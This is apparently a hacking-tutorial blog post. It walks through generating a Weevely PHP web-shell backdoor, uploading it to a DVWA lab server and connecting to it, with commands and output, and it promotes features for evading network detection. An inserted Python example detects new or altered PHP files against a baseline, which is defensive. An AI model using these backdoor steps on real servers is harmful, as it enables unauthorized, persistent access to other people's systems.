Welcome back, Hackers! Today we're going to create a simple PHP web shell and backdoor using Weevely. Weevely is a command-line web shell dynamically extended over the network at runtime, designed for remote server administration and penetration testing.

Its terminal executes arbitrary remote code through the small-footprint PHP agent that sits on the HTTP server. Over 30 modules shape an adaptable web administration and post-exploitation backdoor for access maintenance, privilege escalation and network lateral movement, even in restricted environments.

Let’s get started!

Weevely, a stealth PHP web shell and backdoor, has more than 30 modules available for post-exploitation tasks.

The framework features:

  • SSH-like terminal
  • SQL console pivoted on target
  • HTTP proxy pivoted on target
  • Host configuration security auditing
  • Mount of the remote filesystem
  • Network scan pivoted on target
  • File upload and download
  • Reverse and direct TCP shell
  • Meterpreter support
  • Service account bruteforce
  • Compressed archive management

Weevely's communications are hidden: all traffic between server and client is carried in HTTP cookies. Communications between client and server are obfuscated to bypass NIDS signature detection.

Things you need:

  1. Weevely https://github.com/epinna/weevely3
  2. Web Server (I’m using DVWA)

Generate the backdoor agent

The Weevely client communicates with the PHP agent installed on the target. Move to the weevely3/ folder and run ./weevely.py to print the help, or simply type weevely in your terminal.

~# weevely

[+] weevely 3.2.0
[!] Error: too few arguments

[+] Run terminal to the target
    weevely <URL> <password> [cmd]

[+] Load session file
    weevely session <path> [cmd]

[+] Generate backdoor agent
    weevely generate <password> <path>

~#

To generate a new agent, just use the generate option passing the password and path arguments.

~# weevely generate 123 /root/Desktop/backdoor.php
Generated backdoor with password '123' in '/root/Desktop/backdoor.php' of 1476 byte size.

Then, upload the generated agent under the target web folder. Make sure that the agent PHP script is properly exposed and executable through the web server.
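Seen from the defending side, the upload step is where the agent becomes a file in the web root, and because its traffic is obfuscated against NIDS signatures, drift from a known-good file baseline is a more dependable signal than pattern matching. The Python below is an added example, not part of Weevely or of the original post; the function names, extension list, regex heuristic and sample files are assumptions constructed for illustration.

```python
import hashlib
import os
import re
import tempfile

# Generic heuristic for code-from-string constructs in PHP; it is not a
# Weevely signature and an obfuscated agent can easily avoid it.
DYNAMIC_EXEC = re.compile(rb"\b(eval|assert|create_function|call_user_func)\s*\(", re.I)

PHP_EXT = (".php", ".phtml")  # assumed list; extend to match the server's handlers

def build_manifest(webroot):
    """Map relative path -> SHA-256 for every PHP file under webroot."""
    manifest = {}
    for dirpath, _, files in os.walk(webroot):
        for name in files:
            if name.lower().endswith(PHP_EXT):
                full = os.path.join(dirpath, name)
                with open(full, "rb") as f:
                    manifest[os.path.relpath(full, webroot)] = hashlib.sha256(f.read()).hexdigest()
    return manifest

def audit(webroot, baseline):
    """Return (relpath, reason, has_dynamic_exec) for each file that drifted."""
    findings = []
    for rel, digest in sorted(build_manifest(webroot).items()):
        if baseline.get(rel) == digest:
            continue  # unchanged since the known-good deployment
        reason = "modified" if rel in baseline else "new"
        with open(os.path.join(webroot, rel), "rb") as f:
            findings.append((rel, reason, bool(DYNAMIC_EXEC.search(f.read()))))
    return findings

def demo():
    """Constructed sample: baseline a tiny web root, then introduce drift."""
    with tempfile.TemporaryDirectory() as root:
        index = os.path.join(root, "index.php")
        with open(index, "wb") as f:
            f.write(b"<?php echo 'hello'; ?>")
        baseline = build_manifest(root)
        # Harmless stand-in for an uploaded agent: no recognisable pattern at all.
        with open(os.path.join(root, "backdoor.php"), "wb") as f:
            f.write(b"<?php /* constructed stand-in */ ?>")
        with open(index, "wb") as f:
            f.write(b"<?php eval($x); ?>")  # constructed tampering of a known file
        return audit(root, baseline)

if __name__ == "__main__":
    print(demo())
```

The new file is reported even though the content heuristic finds nothing in it, which is the reason to rely on the baseline rather than on string matching alone.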

Connect to the agent

Launch the weevely script to connect to the remote agent.

~# weevely http://localhost/backdoor.php 123
weevely>

The first weevely> prompt is not yet connected, which lets users set any useful pre-connection options, e.g. the proxies to be used. Running a real command automatically starts the session on the remote target.

weevely> uname -a
Linux TheHackerToday 4.9.0-kali4-amd64 #1 SMP Debian 4.9.30-2kali1 (2017-06-22) x86_64 GNU/Linux